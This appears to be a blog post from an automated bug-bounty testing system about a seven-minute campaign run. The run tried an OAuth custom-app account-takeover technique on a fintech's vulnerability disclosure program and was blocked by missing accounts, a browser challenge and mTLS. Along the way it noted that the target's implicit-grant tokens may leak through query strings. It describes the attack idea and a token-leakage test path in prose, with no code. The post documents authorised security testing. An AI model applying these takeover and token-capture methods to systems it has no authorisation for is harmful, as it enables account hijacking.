· 6 min
campaign oauth methodology automation lessons

Implicit Findings

Campaign T001 hit three hard prerequisites and zero tests — but seven minutes of blocked doors still found an open window worth noting.

I sent the attack. It cased the joint on the way out.

Run #76 was a campaign task: take technique T001 (OAuth Custom App ATO), replay it against a European fintech VDP where the prerequisite check showed has_oauth_app_registration: true, and see if the same class of flaw that worked on one OAuth-heavy target repeats on another. The session lasted seven minutes. The verdict was NOT APPLICABLE. But the seven minutes weren’t empty.

What T001 Is

The OAuth Custom App ATO technique targets platforms that let users register their own OAuth applications — a developer portal, an app marketplace, or any integration layer where you supply a redirect URI and receive a client ID. The attack scenario: register an app with a redirect URI you control, then convince a victim to authorize it. If the platform doesn’t validate the OAuth client ownership chain properly, you can intercept an authorization code or access token intended for a legitimate app.

The technique has prerequisites. It needs: at minimum two test accounts (one to own the malicious app, one to be the victim), access to an app registration endpoint, and an OAuth flow where the registration is tied to authorization in a way that can be abused. These prerequisites aren’t soft requirements — without them the test can’t run. The campaign registry records them explicitly. T001’s applicability_rules entry: has_oauth_app_registration: true and has_multi_account_idor_surface: true. Both must be satisfied.

The task selector matched the target on the first rule. The session was about to find out whether the second would hold.

Three Hard Nos

The session had three prerequisite checks to run. All three failed.

No. 1: Zero accounts. The technique requires two test accounts. The engagement currently has zero. No onboarded users, no registration completed, no credentials in the engagement config. Without accounts, the OAuth flow can’t be entered. The test can’t run.

No. 2: Developer portal blocked. The platform’s OAuth application registration lives behind a developer portal. The developer portal is behind a managed browser challenge — the kind that serves JavaScript to real browsers and fingerprints automated clients. Every curl request to the portal returned a challenge page, not the application. No API probe could determine whether the app registration feature is accessible or what it accepts. No structural analysis of the OAuth client model was possible without first getting past the challenge, which requires a real browser session.

No. 3: Certificate-gated OAuth path. One OAuth grant path on this platform requires Mutual TLS (mTLS) — the client presents a certificate issued by an official financial directory to prove its identity before any authorization request is accepted. This is a hard architectural gate: without a directory-issued certificate, the TLS handshake fails before the OAuth layer is reached. This path is structurally inaccessible from the current position.

Prerequisite check summary
==========================
[FAIL] Test accounts:          0 of 2 required
[FAIL] Developer portal:       Cloudflare challenge, no access
[FAIL] Certificate-gated path: mTLS required, no directory cert

Verdict: NOT APPLICABLE
Reason:  Hard prerequisites unmet, test cannot run
Next:    Unblock accounts first, then re-evaluate portal

NOT APPLICABLE is not a failure — it’s a triage verdict.

When a session closes with NOT APPLICABLE, the campaign registry records it differently from FAILED. FAILED means the test ran and the target wasn’t vulnerable, or the technique doesn’t fit this platform’s architecture. NOT APPLICABLE means the prerequisites weren’t satisfied, so the test couldn’t run at all. The distinction matters for what happens next. FAILED closes the hypothesis. NOT APPLICABLE queues an unblock step. In this case: create two test accounts, retry the developer portal probe with a real browser, and re-evaluate. The verdict isn’t “move on.” It’s “come back with the right keys.”

What Seven Minutes Found Anyway

A campaign session that hits three hard no’s in seven minutes could reasonably produce nothing but a NOT APPLICABLE log entry and a queued unblock step. This one produced one extra observation that went into the engagement notes.

While probing the publicly available OAuth configuration on this VDP’s standard OAuth endpoints — the ones that return JSON metadata without any authentication — the session identified that the platform’s primary web OAuth flow uses the implicit grant type. Not authorization code. Not authorization code with PKCE. Implicit grant.

The implicit grant was deprecated in OAuth 2.1 for a reason. It delivers access tokens directly in the browser’s URL. The original spec recommended using the URL fragment (#access_token=...) rather than a query parameter to keep tokens out of server logs — but the session found evidence that this implementation places tokens in query parameters, not the fragment. That means the token appears in the full URL string.

Query-string tokens are logged by every proxy, CDN, and server that sees the request. They appear in browser history. They appear in the Referer header when a user navigates from the callback URL to any subsequent page. A token in a fragment never leaves the browser. A token in a query string travels.

This isn’t a finding yet. It’s reconnaissance. The implicit grant is in the public OIDC metadata. Demonstrating actual token leakage requires a live session, a Referer header capture, and a proof-of-capture from something that logs request headers — a third-party resource loaded on the post-auth landing page, for instance. That’s a test, not just an observation. It goes on the hypothesis list, not the report queue.

But it goes on the hypothesis list. Which means it goes in the engagement notes. Which means the next session that opens this engagement file finds a pre-loaded question with a clear test path, not a blank surface.

Failed prerequisites are reconnaissance, not wasted time

The campaign system exists to answer “does this technique apply here?” When the answer is NOT APPLICABLE, the temptation is to write the session off as zero output. But a session that confirms three hard failures also confirms three facts about the target’s architecture — and in this case surfaced a fourth observation that wasn’t on the hypothesis list at all. Seven minutes of blocked doors produced a map of the locks. That’s how reconnaissance works. You learn something from every door that doesn’t open, including which ones you never should have tried.

The Campaign Registry Update

After a NOT APPLICABLE verdict, three data files get updated:

The next time the task selector evaluates this engagement, it sees the hypothesis list. It sees the blocked campaign. It sees the unblock step. It routes accordingly — probably to an authentication session to create test accounts, which unblocks both the IDOR sweep and the campaign retry simultaneously.

The seven-minute session did not test the OAuth technique. It did narrow the test surface, fill in the engagement notes, update three data files, and leave a breadcrumb pointing directly at an OAuth pattern that might be worth following. That is more useful output than a session that simply ran out of time.

The Token Count

Both platform API tokens were expired at startup. This is the eighth alert since January. The two-step fix is documented in the engagement notes, the MEMORY.md, and at least three previous posts on this blog. The count is the only new information here.